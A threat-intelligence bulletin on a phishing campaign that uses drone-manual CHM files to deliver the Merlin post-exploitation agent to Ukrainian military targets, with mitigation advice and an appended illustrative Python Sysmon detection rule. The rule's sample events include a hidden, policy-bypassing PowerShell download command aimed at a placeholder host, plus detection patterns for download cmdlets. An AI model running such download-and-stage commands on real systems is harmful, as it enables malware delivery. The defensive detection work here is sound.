Ukrainian Military Targeted in Phishing Campaign Leveraging Drone Manuals

Cyber Security Threat Summary:
“Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin. ‘Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface,’ Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News. The cybersecurity company is tracking the campaign under the name STARK#VORTEX. The starting point of the attack is a Microsoft Compiled HTML Help (CHM) file that, when opened, runs malicious JavaScript embedded inside one of the HTML pages to execute PowerShell code designed to contact a remote server to fetch an obfuscated binary. The Windows-based payload is decoded to extract the Merlin Agent, which, in turn, is configured to communicate with a command-and-control (C2) server for post-exploitation actions, effectively seizing control over the host.”

Security Officer Comments:
Merlin has been used in the past to target Ukrainian government organizations. For instance, just last month, Ukraine’s Computer Emergency Response Team disclosed a similar attack chain that employs CHM files as decoys to infect computers with the open-source tool. For its part, Merlin comes with a wide range of capabilities, making it a popular alternative to post-exploitation tools such as Cobalt Strike and Sliver. Some of the capabilities of Merlin include:

  • Encrypted C2 communication using TLS
  • Remote command shell
  • Module support (such as Mimikatz)
  • Binary support for exe or dll clients

Suggested Correction(s):
Always be extra cautious when downloading file attachments from posts or private messages. When it comes to prevention and detection, the Securonix Threat Research Team recommends:
  • Avoid downloading files or attachments from untrusted sources, especially if the source was unsolicited
  • Monitor common malware staging directories, especially “C:\ProgramData” and other temporary locations such as the user’s local appdata folder, which was used in this attack campaign
  • Deploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection coverage
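As an added illustration, not taken from the Securonix report or the article, the following Python rule shows how the Sysmon process-creation logging recommended above can be used to surface the chain described in the summary (a CHM file, opened by Windows HTML Help, launching PowerShell that fetches a payload into a staging directory). Field names follow Sysmon Event ID 1; the event records, paths and URL are constructed sample values, and the indicator lists are assumptions chosen for this example.

```python
import re

# Constructed sample Sysmon Event ID 1 (process creation) records, reduced to the
# fields the rule reads. Paths and the URL are invented for illustration.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\alice\Downloads\UAV_manual.chm'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": r"powershell -w hidden -ep bypass -c iwr http://example.invalid/p "
                    r"-OutFile $env:LOCALAPPDATA\stage.bin"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell Get-Process"},
]

# Staging locations the recommendations call out: ProgramData and the user's local AppData.
STAGING_DIRS = re.compile(
    r"C:\\ProgramData|\\AppData\\Local|%LOCALAPPDATA%|\$env:LOCALAPPDATA", re.I)
# Common PowerShell download primitives (assumed list) used in "fetch a binary" stages.
DOWNLOAD_CMDLETS = re.compile(
    r"\b(Invoke-WebRequest|iwr|DownloadString|DownloadFile|Net\.WebClient)\b", re.I)


def score_event(ev):
    """Return the list of indicators matched by one process-creation event."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    reasons = []
    # hh.exe is the Windows HTML Help viewer, i.e. the process that opens a CHM file.
    if image.endswith("powershell.exe") and parent.endswith("hh.exe"):
        reasons.append("powershell spawned by HTML Help (hh.exe)")
    if image.endswith("powershell.exe") and DOWNLOAD_CMDLETS.search(cmd):
        reasons.append("download primitive in PowerShell command line")
    if STAGING_DIRS.search(cmd):
        reasons.append("writes to a common staging directory")
    return reasons


def find_suspicious(events):
    """Alert on the CHM -> PowerShell parent chain, or on two or more weaker indicators."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if any("hh.exe" in r for r in reasons) or len(reasons) >= 2:
            hits.append({"CommandLine": ev["CommandLine"], "reasons": reasons})
    return hits
```

In a real deployment the same logic would run over Sysmon events exported from the Windows event log, with PowerShell script block logging providing the decoded script content that the command line alone does not show.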